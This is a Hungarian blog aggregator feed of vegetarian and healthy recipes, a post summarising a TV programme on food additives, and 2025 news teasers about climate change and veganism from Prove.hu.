Ma ezzel kedveskedtem Hugónak gyermeknap alkalmából. Sajnálom, hogy megintcsak palacsinta, de imádjuk, és nem lehet megunni:) És eddig ez a legjobb recept. Egy sokak által ismert és kedvelt oldalról jött az alapötlet, de mint mindig, most is megpróbáltam egészségesebbé varázsolni ezt az ínycsiklandó édességet. Ebből a mennyiségből, 13-15 db pehelykönnyű hajszálvékony palacsintát lehet készíteni. Hozzávalók: a tésztához: - 25 g natúr(cukrozatlan) jóminőségű kakaópor - 100 g liszt(fehér bio tönköly) - 2 db bio tojás - 40 g olvasztott bio margarin, vagy ghí - 2,5 deci hideg növényi tej - 1 ek nádcukor - csipet só - 1-2 ek. repce olaj a sütéshez a töltelékhez: - fél kiló túró - 3 ek. méz - egy marék mazsola - egy citrom héja - egy ek. tejföl a szószhoz: - pár szem érett eper - egy ek. méz A tojást a csipet sóval, és a cukorral kézi habverővel habosra keverem, majd hozzáadom az olvasztott zsiradékot, a tej felét, és homogénre kavarom. Ezt követően hozzáadjuk tej másik felét. Ha elkevertük, letakarva 2 órára a hűtőbe rakjuk.A serpenyőt minden egyes palacsinta előtt olajjal kikenjük... majd kb fél szedőkanálnyi tejszínszerű tésztát(nekem még kellett hozzá adnom egy kis tejet) egyenletesen eloszlatunk benne. A töltelék hozzávalóit csak összedolgozzuk, megtöltjük vele a palacsintákat kedvünkrevaló módon tekerjük, vagy hajtogatjuk. Az epreket megmossuk, felkockázzuk, és egy ek. mézzel jól elkeverjük és a palacsinták tetejére halmozzuk. Jó étvágyat! Tipp:Anyukák próbáljátok ki Nutellával is. Duplacsokis finomság :)
Halvás porridge
2010. május 21. Legyen néktek eledelül...
Könnyű, gyors, egyszrű, finom, olcsó. Ne kérdezze senki hogy a neve mit is jelenthet, mert el sem tudom képzelni. A halva egy görög édesség, amit napraforgómagból csinálnak. A porridge szót életemben nem láttam, nem hallottam, nem olvastam, de már tudom hogy ilyen is van:) Az egész szemes zabot kell megfőzni, ami elég furcsa... negyed óra főzést javasol, nálam úgy alakult, hogy fél órát főtt, mert sok dolog történt közben. Nem ártott neki. Megállapítottuk, hogy ha jobban szétfő a zab, vagy pehllyel indítunk, csinosabb is lehetett volna. A halvás karobos öntet nagyon finom, máskor is fogom használni. Lehet hogy okoskodom majd még vele, hogy hogyan, mitől lehetne sűrűbb, mert nagyon beindította a fantáziámat. Szerintem fagyi lesz a dolog vége, így a nyár közeledtével. 100g zabból csináltam, ami kicsit kevés volt, szerencse hogy a tegnapi reggeliből még volt egy kis maradék, amivel Gergő megpakolhatta a hasát. Banánnal tálaltam, ahogy az a képeken is látszik, ami tejesen egyedi ötlet, de anélkül elég egyhangű lett volna, és a kókuszreszelék is csak jót tett neki.
Friedheim granola
2010. május 19. Legyen néktek eledelül...
Kedves az étel elnevezésétől, hogy igazából semmit nem árul el magáról:). Túljártam az eszén, és elkészítettem a receptet. A granol a egy háziműzli , ami hosszú ideig kell szárítani alacsony hőfokon. Ez volt az első ilyen kísérletem, és egészen jól sikerült. A könyv gigantikus mennyiségekkel dolgozik, de mi nagyon bátortalanul csak az ötödét készítettük el. Így kellett 1liter zabot pelyhesíteni (vállalta az én drága lovagom), de a többi alapanyaggal együtt is belefért egy kisebb tepsibe. 100fokon, minimum 3 órát kell hagyni, és háromnegyed óránként keverni kell rajta. Kibírható, de legfontosabb, hogy megéri. Az édes szirup, amit főzni kellett rá körbevette a zabot, és fantasztikus ropogós édességgé állt össze a sok finomság. Legközelebb lehet édesebb. Alig várom, hogy legyen megint lelkierőnk nekiesni ennek a nagyüzemi pelyhesítésnek , és készítem a következő félét. Fogyasztható növényi tejjel, én szójatejjel ettem, illetve van egy-két étel, aminek ajánlott hozzávalója, pl a Banán Betty -nek . A könyv ajánlása, vászonzsákokban tároljuk, így természetesen én is elkészítettem a névvel ellátott zsákocskát már a legelső granolánknak is, és a többi sem marad majd otthon nélkül.
Kukoricatorta
2010. május 9. Legyen néktek eledelül...
Reggel hétkor birtokba vettem Gergő édesanyjának a konyháját. Az első problémát az okozta, hogy a villany tűzhelyt nem tudtam működésre bírni. Az mentette meg a reggelinket, hogy van egy spéci főző masinája, és gyorsan elhittem magamról, hogy tudom majd használni(Mindenki aludt még aki segíthetett volna, bár Olivér mindent megtett hogy bekapcsolja, de neki sem sikerült:)). Beletettem a kukoricát, háromszoros mennyiségű vízben, és had szóljon: hőfok választás, keverési ütem, és idő... elindult. Némiképp megkönnyebbültem, de a teljes megnyugvást az okozta, amikor láttam hogy a hőfok szépen kúszik felfele. Egy pipa. Találni kellett egy alkalmas formát. A mosogatóban megakadt a szemem a tegnap esti gyümölcs saláta üveg tálján. Mentem még egy kört a konyhában, nem találtam alkalmasabb tálat, így azt mostam el, kentem ki olajjal, és raktam ki gyümölcsökkel. Olivér persze közben felfalta a narancs és banán felét, de így is egészen pofás formát sikerült produkálni a maradékból. Letelt a 20 perc, tortát összeállítottam, kiraktam a teraszra, és reménykedtem, hogy mire Gergő farkas éhesen felkel kihűl annyira, hogy ki tudom önteni, és nem folyik szét. A jelek szerint ügyesen drukkoltam, mert innentől már minden gördülékenyen ment az elfogyasztást is belevéve. Ma először voltak laikus kóstolóink is, akik elég bizalmatlanul, de vállaltak egy-egy szeletet. Szerintem nem bánták meg. Nyakon öntötték ugyan extra adag datolyavajjal , de ezt semmi sem tiltja. Személyes véleményem az, hogy az olajos magok nagyon hiányoznak belőle, szerintem hamar éhesek leszünk, és az ízének is adott volna egy teltebbséget . Ettől függetlenül egyetlen szelet maradt csak, de délutánra már ez is eltűnik majd valaki pocakjában.
Kifőztük Magazin 2. szám
2010. április 9. KryaSpirit-Vegalife
Tegnap reggel megjelent a Kifőztük Magazin második száma! A márciusi szám sikerén felbuzdulva, igyekeztünk még inkább a kedvetekre tenni és olyan ételeket elkészíteni, amiket reményeink szerint szívesen fogadnátok. Az ingyenes újságot letölthetitek a www.kifoztuk.hu oldalról. A vega-reform ételek között megtaláljátok az alábbi édességet és még sok más receptet is. Kellemes főzőcskét Kívánok!!
Sárgarépás diós rizs
2010. február 7. La Cuisine d'Adéle
Hihetetlenül egyszerű, de annál ízlezesebb étel. Annyira egyszerű, hogy el is bizonytalanodtam, feltegyem-e egyáltalán a blogra. Tekintettel azonban arra, hogy én is egy receptkönyvben bukkantam rá (Gabonafélék című könyvemben), úgy döntöttem, miért ne szerepeltethetném én is saját virtuális receptgyűjteményemben. Az utóbbi időben egyre jobban kedvelem a diót, holott korábban nem voltam nagy rajongója. Az enyhén édeskés, narancsszínű sárgarépával és a kissé diós aromájú barnarizzsel remek elegyet alkot. Dióval kapcsolatos újkeletű felfedezésem továbbá a dióolaj. Teljesen beleszerelmesedtem. Fantasztikus illata, aromája, íze van. Hideg ételekhez, salátákhoz és főzéshez is kiváló. Gyakran készítek diós salátát, végtelenül egyszerűen. Vegyes zöld salátaleveleket dióolajjal összeforgatok, végül az egészet dióbéllel megszórom. Magában is, de camembert-el és pirítóssal kiegészítve igazán mennyei csemege. Sárgarépás diós rizs Hozzávalók: (2 adaghoz) 1 1/2 dl barnarizs (én bio gyorsfőzésűt használok) 3 nagyobb vagy 4-5 kisebb sárgarépa (ezúttal bio volt az is) 2 maroknyi dióbél kevés olaj só (himalaya) Elkészítés: A rizst szűrőben alaposan megmostam, lecsepegtettem, kevés olajon illatosra pirítottam, kétszeres mennyiségű vízzel felöntöttem, sóztam, kis lángon fedő alatt puhára főztem. Amíg a rizs főtt, a répákat megtisztítottam, leöblítettem, vékony csíkokra vágtam. A diót száraz serpenyőben megpirítottam, durvára vágtam. A répát kevés olajon (dióolajat használtam a finom illata, aromája miatt) átforrósítottam, enyhén sóztam, majd kis lángon fedő alatt roppanósra pároltam. Végül a főtt rizst a répacsíkokkal és a diódarabokkal óvatosan összeforgattam.
Színezékekről és egyéb adalékokról
2009. október 21. La Cuisine d'Adéle
... szólt a Spektrum Tv figyelemfelkeltő és elgondolkodtató ,,Étkek és tévhitek - Ráadás című műsora, melybe teljesen véletlenül, ám még éppen idejében kapcsolódtam be. A műsor sorra vette a napjaink élelmiszereiben megtalálható adalékanyag-csoportokat, mindegyiknek kb. azonos időt, teret szentelve, ám számomra a színezékekkel kapcsolatos megállapítások bizonyultak a legdöbbenetesebbnek. A keretsztori egy átlagos - ha jól emlékszem - három gyermekes család mindennapi életének, táplálkozási szokásainak bemutatása volt. Az édesanya igyekezett egészségesen táplálni gyermekeit - ez fontos, a későbbiekben még jelentősége lesz... Színezékek Érdekes és megdöbbentő volt már maga az a tény is, hogy mekkora hatással van az emberi ízérzékelésre az elfogyasztott élelmiszer színe. Tegyük hozzá, elsősorban a gyermekekre - ráadásul a színezett, színes ételek elsőszámú célközönsége is ők! Szóval, ugyanazt a málnaízű italt öntötték 3 pohárba, ez egyiket rózsaszínre, a másikat átlátszó - vízszínűre, a harmadikat pedig kékre színezték. Majd gyerekekkel kóstoltatták meg a poharak tartalmát. A gyermekek túlnyomó többsége a rózsaszín folyadékot eper, illetve, málnás ízűnek, a színtelent limonádénak, a kéket pedig áfonyásnak érezte! A színezékek és a különböző adalékanyagok hosszú távú hatása az emberi szervezetre felbecsülhetetlen, de az, hogy rövid távú hatásuk is kézzelfogható, számomra megdöbbentő volt. A következő kísérletet végezték el. Gyerekeket két csoportra osztottak, s két asztalt raktak tele ételekkel. Az egyik asztalon intenzív színű, mesterséges anyagokat tartalmazó élelmiszereket, a másikon házi készítésű ételeket helyeztek el. A gyermekek különböző játékokat játszottak - mindkét csoport ugyanazokat - melyek során mérhetővé vált koncentrációjuk, koordinációjuk, ügyességük, fegyelmezettségük. Majd evés következett: egyik csoport csak az egyik, a másik csak a másik asztalról falatozott. Fél óra elteltével ugyanazokat a játékok játszották. Az színes-adalékanyagos élelmiszereket fogyasztó gyermekek koncentrációs és koordinációs képességei láthatóan csökkentek, többen kezelhetetlenné váltak, a csoportban az egyik kisfiút úgy megütötte egy társa, hogy felrepedt és vérzett az ajka és közülük többen sírtak. Hasonló tapasztalatokról számolt be az az édesanya is, aki miután hiperaktivitást állapítottak meg gyermekénél, megvonta tőle a mesterséges kiegészítőket tartalmazó ételeket, a gyermek két hétig elvonási tüneteket produkált (!!), majd hiperaktivitásra utaló tünetei megszűntek. Mesterséges édesítőszerek Élettani hatásukról szóló beszámolók nem egyértelműek. A műsorban az aszpartamot (E-951) emelték ki, mint a legellentmondásosabb édesítőt, mellyel nem árt vigyázni. Egy fiatal, I-es típusú cukorbetegségben szenvedő fiú mesélt arról, hogy IBS-t (irritábilis bélszindróma) állapítottak meg nála, de miután elhagyta étrendjéből az aszpartamot, tünetmentessé vált. Tartósítószerek A műsorban elsősorban szulfitokra hívták fel a figyelmet, amelyek különösen kerülendők. Megszólalt egy hivatásos versenytáncos, aki 35 évig tartó asztma után vált gyakorlatilag tünetmentessé annak köszönhetően, hogy elhagyta étrendjéből a szulfit-származékokat (s ezzel együtt az egyéb adalékokat) tartalmazó élelmiszereket. Ízesítők, ízfokozók A nátrium-glutamát (E-621) káros hatásait emelték ki, az ún. kínai étterem-szindrómát, de ezt elég sokan leírták már. Azt a veszélyt azonban nem lehet elégszer tudatosítani, hogy ha már egészen kis gyermekkorban kezdi meg az ember az ízfokozókkal, mesterséges ízesítőkkel felturbózott ételek fogyasztását, az ízérzéke erre ,,áll rá és már nem érzi elég ízesnek a természetes táplálékokat. Kiváló példa erre a műsorban ismertetett kísérlet: 10 gyerekkel kóstoltattak mesterséges ízesítővel készült narancslét és frissen facsart, tiszta narancslevet. A 10-ből 7 gyerek a gyári, ,,mű italt találta finomabbnak. Miután mindezeket sorra vették, a film készítői visszatértek, az írásom elején említett családhoz. Az édesanya most szembesült azzal, hogy az általa egészségesnek gondolt élelmiszerek többsége (pl. light gyümölcsjoghurt) tele van mesterséges adalékokkal. S ez tényleg azért szörnyű, mert nem egy felelőtlen emberről volt szó, aki nem törődik a családja egészséges táplálkozásával, hanem azt gondolta, helyesen cselekszik, mert az általa egészségesnek gondolt - s teszem hozzá a média, reklámok által annak beállított - élelmiszereket adta a gyerekeinek. (Gondolkodom azon, hogy ennek a jelenségnek, nevezetesen az általam ,,álegészségesnek nevezett élelmiszerek reklámozásának, fogyasztásuk ösztönzésének - pl. egyél reggeli helyett 4 db finomított cukros, tartósítós, aromás, kb. 25-30 db összetevőből álló, nyomokban teljes őrlésű gabonát, mézet és mogyorót tartalmazó kekszet, és ezzel tök oké vagy, mert ez megfelelően táplál és számodra délig tartó lendületet ad - szentelek majd egy külön postot.) Nos, az anyuka átnézte a hűtőt, s megszabadult az összes oda nem illő dologtól. Majd egy adalékanyagmentes próbahét következett. A család tapasztalatai pedig rendkívül kedvezőek voltak! Anyuka úgy vélte, nem is olyan nehéz kiiktatni ezeket az élelmiszereket az étrendjükből és gyermekei viselkedésében is pozitív változások álltak be. Persze azért érdemes megnézni, magát a filmet is, ha sikerül elcsípni, de számomra annyira döbbenetes és figyelemfelhívó volt, hogy úgy gondoltam, érdemes a blogban is postolni. Olyan információk ezek, amelyek elgondolkodtatnak, s azt érzem, valóban változtatásra sarkallnak... rám legalábbis nagy erővel hatottak, pedig egy jó ideje száműzöm már az étrendemből az adalékanyagokat tartalmazó élelmiszereket... Mi tehát a konklúzió? A film készítői úgy foglalták össze, hogy alapvetően most is ,,ősemberek vagyunk, a szervezetünk nem az adalékanyagok feldolgozására van predesztinálva, amelyeknek hatása - mi történik, ha ezek az adalékanyagok kombinálódnak, reakcióba lépnek egymással az emberi szervezetben?, mi lesz a túlságosan sok mesterséges kiegészítővel felturbózott élelmiszert fogyasztó emberrel 20 vagy 30 év múlva? - felbecsülhetetlen... Én úgy gondolom, nagyon fontos a tájékozódás, a tudatosság, az hogy mit súgnak érzékeink, ösztöneink, no, meg a józan eszünk... (Képek forrása: www.fittcsalad.hu, www.pannonicum.hu)
Névnapi ricottatorta á la Dolce Vita
2009. augusztus 2. La Cuisine d'Adéle
Mióta csak felkerült a blogjára, tudtam, hogy egyszer mindenképpen ki kell próbálnom Dolce Vita ricottatortáját. A megfelelő pillanat most érkezett el: Anyut leptem meg névnapja alkalmából vele. Az eredmény? Teljes siker! :-) Az ötlet és a recept is fantasztikus... Szeretem az egyszerű recepteket, az olyanokat, amelyek kevés hozzávalóval dolgoznak, nincsenek túlbonyolítva, a végeredmény mégis egészen különleges, mutatós és finom. További kritérium természetesen - talán említenem sem kell - hogy semmilyen ,,oda nem illő, mesterséges alapanyag használatát ne kívánja meg az étel leírása (a zselatintól pl. kiráz a hideg). Nos, ez egy ilyen recept. Ami még vonzóbbá tette számomra, hogy sütés nélkül - s amúgy is nagyon gyorsan - készül. Ugyanis a sütőnk már egy ideje gyakorlatilag használhatatlan, de ha még az is lenne, nem szívesen üzemeltem volna be ebben a harmincegynéhány fokban. A végeredmény miatt mégis kicsit izgultam. Mi van, ha nem áll össze a kekszes alap? Nem tartja meg a formáját a ricottakrém? Pontosan követtem Dolce Vita utasításait és minden remekül működött. Egészen apróra törtem a kekszet, s így az alap egyben maradt és szépen szeletelhető lett, a krém pedig tökéletesre sikerült. Könnyű, a narancsos felhangtól kissé fanyar és pikáns, a legkevésbé sem émelyítően édes desszert lett az ünnepelt, na és persze a mi jutalmunk, akik kóstoltuk... Azóta, azaz múlt vasárnap óta Anyu többször kérdezte: mikor csinálok újra? Kell ennél nagyobb elismerés? :-) A receptet - bár az eredeti e szempontból is tök oké - kissé reformosítottam, s nálam így készült. R icottatorta Hozzávalók: 15 dkg keksz (bio tönköly háztartási kekszet használtam - Naturgold) 8 dkg biomargarin 50 dkg ricotta 1 dl narancslekvár (St. Dalfourt használtam, ami hozzáadott cukor helyett természetes szőlőlével van édesítve, ezeken kívül pedig csak természetes gyümölcspektint tartalmaz) 2 (bő) evőkanál bio nádporcukor Elkészítés: Konyhai késes robotgépben zsemlemorzsa állagúra zúztam a kekszet, eközben megolvasztottam a margarint. A kekszmorzsát alaposan összeforgattam a margarinnal és a 18 cm-es kapcsos tortaformám aljára nyomkodtam. Nagyobbacska tálba borítottam a - 2 doboz - ricottát, hozzáadtam a lekvárt és a porcukrot (a nádporcukor nem annyira édes, mint a ,,hagyományos finomított kristály-, illetve porcukor!), fakanállal homogén masszává kevertem. A ricottakrémet rásimítottam a kekszes alapra. Az eredeti recept azt írja, minimum öt órára hűtőbe kell tenni. Én előző este készítettem el a tortát, s a másnapi ebéd után tálaltam. Megjegyzés: A St. Dalfour narancslekvárjáról jó tudni, hogy narancshéjdarabokat is tartalmaz. Ennek következtében van egy kis kesernyés ,,beütése, ami a ricottakrémen is érezhető. Aki tudja magáról, hogy az enyhe kesernyésség biztosan zavarná, természetesen használjon másfajta, jó minőségű - ideális esetben házi - narancslekvárt vagy - ahogyan Dolce Vita is írja - egy narancs reszelt héját és turmixolt gyümölcshúsát.
Erdei gombás hagymás tokány
2009. május 18. Cukor, bors, só
Ez is egy nagyon egyszerű és gyors recept azoknak, akik szeretik a sok hagymát. A gomba csak extra benne, lehet simán csak hagymából is készíteni: Hozzávalók: - 35 dkg. vegyes erdei gomba (elhagyható) - 3 evőkanál olaj - 2 nagy fej vöröshagyma (ha nincs gomba, lehet többet is tenni 4-5 darabot akár) - 1 kiskanál édes-nemes csemege paprika - só - őrölt fekete bors Elkészítés: Forró olajon az apróra vágott vöröshagymát gyakori kavargatással szalmasárgára pirítjuk, majd hozzáadjuk az előkészített és szeletelt gombát és jól összeforgatva pároljuk mindaddig, amíg levet enged. Ekkor megszórjuk a paprikával, ízlés szerint sóval és őrölt fekete borssal, majd átkevergetés után lassú tűzön készre főzzük fedő alatt. Galuskával, puliszkával, vagy főtt burgonyával tálalhatjuk, de simán kenyérrel is nagyon finom.
Egyre intenzívebbek és gyakoribbak a tengeri hőhullámok a klímaváltozás miatt
2025. április 21. Prove - a világ vegán szemmel
Hosszabbak, intenzívebbek és gyakoribbak lettek a tengeri hőhullámok a globális felmelegedés miatt - állítja egy új tanulmány. A kutatók elmondásuk szerint azt szeretnék még több bizonyítékkal alátámasztani, sürgősen szükség van mind a klímaváltozás enyhítését, mind az alkalmazkodási stratégiákat célzó intézkedésekre. A tengeri hőhullámok olyan extrém éghajlati események, amelyek során a tengerek és óceánok egyes pontjain… The post Egyre intenzívebbek és gyakoribbak a tengeri hőhullámok a klímaváltozás miatt appeared first on Prove.hu.
Ez lehet az egyik fő közös elem a kék zónák hosszú életű lakóinak életmódjában
2025. április 19. Prove - a világ vegán szemmel
A kék zónákban élők étrendjében az egyik legfontosabb közös pont a nagy mennyiségű összetett szénhidrát - állítja Dan Buettner, a kék zónák egyik kutatója. Buettner úgy véli, ez lehet az egyik kulcseleme a hosszú életnek és egészséges öregedésnek, ám sajnálatos módon gyakran egy kalap alá veszik az összes szénhidráttípust. Dan Buettner két évtizede kutatja a… The post Ez lehet az egyik fő közös elem a kék zónák hosszú életű lakóinak életmódjában appeared first on Prove.hu.
Drasztikus elszegényedést hozhat a felmelegedés az átlagember számára
2025. április 8. Prove - a világ vegán szemmel
Az eddigi modellek valószínűleg alábecsülték a globális felmelegedés gazdasági hatását - állítja egy új tanulmány. A kutatók szerint a korábbi modellek olyan feltételezéseken alapultak, amelyek nem tükrözik teljes egészében a valóságot. Az átlagember akár negyven százalékkal is szegényebb lehet, ha a felmelegedés eléri a 4 Celsius-fokot. Ezt állítja egy új kutatás, amely szerint a korábbi… The post Drasztikus elszegényedést hozhat a felmelegedés az átlagember számára appeared first on Prove.hu.
Élelem- és vízszűkösséggel fenyeget kétmilliárd embert a gleccserek olvadása
2025. április 6. Prove - a világ vegán szemmel
A gleccserek olvadása nemcsak a tengerszint emelkedését okozhatják, hanem súlyos hiányokat is az élelem- és vízellátásban. Az ENSZ legújabb jelentése szerint kétmilliárd ember alapvető szükségletei kerülhetnek veszélybe. Kétmilliárd ember víz- és élelemellátását fenyegeti a gleccserek olvadása - írja az ENSZ legújabb vízfejlesztési világjelentésében. A március 22-ére, a víz világnapjára készült dokumentum figyelmeztet, a korábban soha… The post Élelem- és vízszűkösséggel fenyeget kétmilliárd embert a gleccserek olvadása appeared first on Prove.hu.
Visszatérhet a savas eső Trump környezetvédelmi lazításai miatt
2025. április 3. Prove - a világ vegán szemmel
A Trump-adminisztráció az elmúlt hetekben alapvető környezetvédelmi szabályozásokat vont vissza. A tudós, aki felfedezte a savas esőt, most azt mondja, ezek az intézkedések a jelenség visszatérését idézhetik elő. Az Egyesült Államok környezetvédelmi ügynöksége, az Environmental Protection Agency (EPA) harmincegy, környezetet és klímát érintő szabályozást vont vissza március közepén mindössze néhány óra alatt. Gene Likens, aki… The post Visszatérhet a savas eső Trump környezetvédelmi lazításai miatt appeared first on Prove.hu.
Az ételpazarlás visszaszorításaképp vadásznának farkasra a spanyolok
2025. április 1. Prove - a világ vegán szemmel
A farkas is hozzátesz egy újonnan elfogadott spanyol intézkedéscsomag szerint az ételpazarláshoz a maga után hagyott haszonállattetemekkel. Erre hivatkozva pedig indokolttá válhat ezeknek az állatoknak a kilövése az országban. Az újítást az ellenzéki konzervatívok hozták tető alá, szövetségre lépve több más politikai erővel. Sara Aagesen ökológiai átmenetért és demográfiai kihívásokért felelős miniszter azt ígérte, a… The post Az ételpazarlás visszaszorításaképp vadásznának farkasra a spanyolok appeared first on Prove.hu.
A kertészkedés bevett szabályait is felülírja a klímaváltozás
2025. március 30. Prove - a világ vegán szemmel
Az ültetés, zöldség- és gyümölcstermesztés kapcsán számos családi praktikát eltanulhattál a szüleidtől, nagyszüleidtől. Ma már azonban ezeknek a trükköknek csak egy része alkalmazható. A változó éghajlati körülmények mellett nagyobb hangsúly kerül többek között a vízmegtartásra, a megfelelő árnyékolásra és a kártevők elleni természetes védekezési lehetőségekre is. Itt a tavasz, a kertészek többségének - vélhetően -… The post A kertészkedés bevett szabályait is felülírja a klímaváltozás appeared first on Prove.hu.
Egyre többen fogyasztják a mogyoróvajat, amiben már az inkák és az aztékok is látták a jövőt
2025. március 10. Prove - a világ vegán szemmel
Az Egyesült Államokban már régóta népszerű termék a mogyoróvaj, Európa azonban sokáig nem adta be a derekát - a heves ostrom ellenére sem. Az európai keresletnövekedés csak az elmúlt pár évben indult be, elsősorban a megváltozott táplálkozási szokásoknak és a növényi alapú étrend terjedésének köszönhetően. A család kedvenc reggelije a zabkása mellett egyértelműen a mogyoróvajjal… The post Egyre többen fogyasztják a mogyoróvajat, amiben már az inkák és az aztékok is látták a jövőt appeared first on Prove.hu.
Átszakadt a finanszírozási gát - lesz pénz biodiverzitásra, csak kérdés, miből
2025. március 2. Prove - a világ vegán szemmel
Biodiverzitás-finanszírozásról született megállapodás az Egyesült Nemzetek Szervezetének római konferenciáján. A káoszba fulladt kolumbiai egyezkedést követően az országok most abban maradtak, hogy 2030-ig évi 200 milliárd dollárt fizetnek majd be erre a célra. Sikerrel zárult az Egyesült Nemzetek Szervezetének (ENSZ) kétnapos római biodiverzitási konferenciája - adta hírül a The Independent. A találkozón olyan kérdésekkel foglalkoztak, amelyek… The post Átszakadt a finanszírozási gát - lesz pénz biodiverzitásra, csak kérdés, miből appeared first on Prove.hu.
A britek döntő többsége elítéli az állattenyésztésben alkalmazott eljárásokat
2025. február 27. Prove - a világ vegán szemmel
Az Egyesült Királyságban élők nagy többsége elítéli a fájdalommal és szenvedéssel járó állattenyésztési praktikákat - derült ki egy új felmérésből. Ennek ellenére továbbra is alkalmazzák ezeket az eljárásokat a szektorban, ráadásul széles körben. Legyen szó a kakascsibék élve darálásáról, a disznók farkának levágásáról vagy a borjak érzéstelenítés nélkül végzett kasztrálásáról, a közvélemény határozott és egyértelmű… The post A britek döntő többsége elítéli az állattenyésztésben alkalmazott eljárásokat appeared first on Prove.hu.
Áradások, fogyó vízkészletek, energiaszűkösség - ezeket okozhatják az olvadó gleccserek
2025. február 23. Prove - a világ vegán szemmel
A klímaváltozás hatására olvadó gleccserek közel két centiméteres tengerszint-emelkedést okoztak ebben az évszázadban, derült ki egy új tanulmányból. A 2000 és 2023 között folyt kutatás szerint a világ gleccsereiről 6,542 ezermilliárd tonna jég olvadt le két évtized alatt. Gyorsabban olvadtak a gleccserek az elmúlt két évtizedben, mint valaha. Egy új kutatás szerint csak ez a… The post Áradások, fogyó vízkészletek, energiaszűkösség - ezeket okozhatják az olvadó gleccserek appeared first on Prove.hu.
3+1 isteni csigavariáció, ha már unod a kakaósat
2025. február 21. Prove - a világ vegán szemmel
A minden pékségben kapható kakaós csiga igazi klasszikus, és szinte minden édesszájú kedvence, de néha jólesik egy kis változatosság. Szerencsére számtalan más izgalmas variációja létezik, amelyek ugyanolyan omlósak, illatosak és isteniek lehetnek. Kevés rosszabb dolog van a kiszáradt péksüteményeknél, amelyeket munkából hazafelé, zárás előtt pár perccel kapsz le a boltban a polcról. Ezek az édes… The post 3+1 isteni csigavariáció, ha már unod a kakaósat appeared first on Prove.hu.
Extrém hajhullással küzdesz, mióta növényi étrendre váltottál? Ez okozhatja
2025. február 15. Prove - a világ vegán szemmel
Természetesen nemcsak a növényi étrend miatt alakulhat ki hajhullás, de bizonyos tápanyagok bevitelére érdemes odafigyelni az egészséges hajnövekedés érdekében. Ha tehát vegán életmódra váltva azt tapasztalod, a szokásosnál nagyobb mértékben hullik a hajad, ne ess pánikba! Inkább bizonyosodj meg róla, hogy elegendőt viszel be a szervezetedbe az egészséges haj fenntartásához szükséges tápanyagokból! Ha a közelmúltban… The post Extrém hajhullással küzdesz, mióta növényi étrendre váltottál? Ez okozhatja appeared first on Prove.hu.
Csokis datolyaszelet mogyoróvajjal és sópehellyel
2025. február 14. Prove - a világ vegán szemmel
Hozzánk is elért a csokis-mogyoróvajas datolyaszelet trendje, ami nem véletlenül hódít a közösségi médiában. Egyszerű, gyorsan elkészíthető, ráadásul isteni finom, és még egészséges is. Mindössze négy hozzávalóra van hozzá szükség, és néhány perc alatt egy mennyei, mégis egészséges desszertet varázsolhatsz az asztalra. Az édes és sós ízek tökéletes egyensúlya mellett a textúrák is remekül harmonizálnak:… The post Csokis datolyaszelet mogyoróvajjal és sópehellyel appeared first on Prove.hu.
Járványfékező is lehetne a farkas, de az előítéletekkel szemben tehetetlen
2025. február 12. Prove - a világ vegán szemmel
A vadállomány szabályozásában és a járványok terjedésének visszaszorításában is kulcsszerepet játszhatna a farkas, ám egy európai uniós kezdeményezés nyomán a jövőben ismét vadászhatóvá válhat. A Prove-nak nyilatkozó farkaskutató hangsúlyozta, a haszonállatok védelmében messze nem a farkas kilövése a leghatékonyabb módszer. Akár visszafelé is elsülhet egy ilyen lépés, miközben veszélyezteti az amúgy is törékeny populációt. Egy… The post Járványfékező is lehetne a farkas, de az előítéletekkel szemben tehetetlen appeared first on Prove.hu.
Egyszerű, gyors gluténmentes gyömbéres keksz
2025. február 8. Élj harmóniában
Februárban, nem véletlen, hogy nagyon sokan betegek, megfáznak. Az időjárás még kifejezetten hideg , de már egyre több a nedvesség - emelkedik a talajvíz, több a köd, pára. Az egészséged megőrzéséhez hasznos, ha a táplálkozásoddal is támogatod a tested melegítését és szárítását. Ez egy szuper édesség ehhez:) Hozzávalók: 12 dkg hajdinaliszt 10 dkg vaj (vegánváltozatban vegán margarin) 8 dkg apró levelű zabpehely 8 dkg barna nádcukor 3 púpos evőkanál karobpor vagy ha nincs akkor kakaópor 1 tk. sütőpor víz Egy tálba keverd ki a vajat a cukorral, majd keverd hozzá a többi száraz hozzávalót, végül apránként tegyél hozzá egy pici vizet - kb. 1 dl . Olyan állagú lesz az eredmény, ami masszaként jól formálható, nem ragad, nem folyik. Kis gombócot vegyél ki a masszából és a tenyereid között lapítsd ki vagy a tepsiben egy kanállal, vagy pohár segítségével. 180 fokra előmelegített sütőben süsd készre. (kb. 15 perc) Vegyszermentes (bio) alapanyagokat használj! Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok:) szeretettel: KAti #gluténmentes #gyors #gyömbéres #zabpelyhes #keksz #hajdinaliszt
Egyre több a húsmentesen étkező az idősgondozásban
2025. február 6. Prove - a világ vegán szemmel
Az Egyesült Királyságban néhány éven belül megduplázódhat a vegetáriánus gondozottak száma, a vegánoké pedig akár háromszorosára is nőhet egy friss felmérés szerint. Az idősgondozási szektor szolgáltatóinak fel kell készülniük arra, hogy a jövőben sokkal több húsmentesen étkező gondozott számára kell szakszerű ellátást biztosítaniuk. Világszerte egyre többen hagyják maguk mögött az állati fehérjéket és váltanak növényi… The post Egyre több a húsmentesen étkező az idősgondozásban appeared first on Prove.hu.
Így készül a kimchi, a fermentált koreai káposzta (vegán recept)
2025. január 29. Prove - a világ vegán szemmel
Ha unod a hagyományos savanyú káposztát, akkor jó helyen jársz: ez a fűszeres, csípős, koreai változat a megszokotthoz képest izgalmas, intenzív ízvilágú, ráadásul rendkívül egészséges is. Hagyományos kimchi recept következik - egy-két módosítással. Gochugaru, édes rizsliszt, koreai retek: ha ezek a beszerezhetetlennek hangzó összetevők korábban eltántorítottak a házi kimchi elkészítésétől, akkor jó hírünk van. Minden… The post Így készül a kimchi, a fermentált koreai káposzta (vegán recept) appeared first on Prove.hu.
A növényi fehérje jótékonyan hathat a szívre és a keringésre
2025. január 25. Prove - a világ vegán szemmel
Egy átlagos amerikai étrendjében egy a háromhoz a növényi és állati forrásból származó fehérjék aránya. Egy friss tanulmány szerint a növényi fehérjék arányának növelése csökkentheti a szív- és érrendszeri megbetegedések, köztük a koszorúér-betegség kialakulását. Az arány mellett a megelőzésben fontos szerepe van a fehérjebevitel mértékének is. A növényi fehérjék jótékony hatása régóta ismert, egészségügyi előnyeiket… The post A növényi fehérje jótékonyan hathat a szívre és a keringésre appeared first on Prove.hu.
Légzésfigyeléses meditáció
2025. január 23. Élj harmóniában
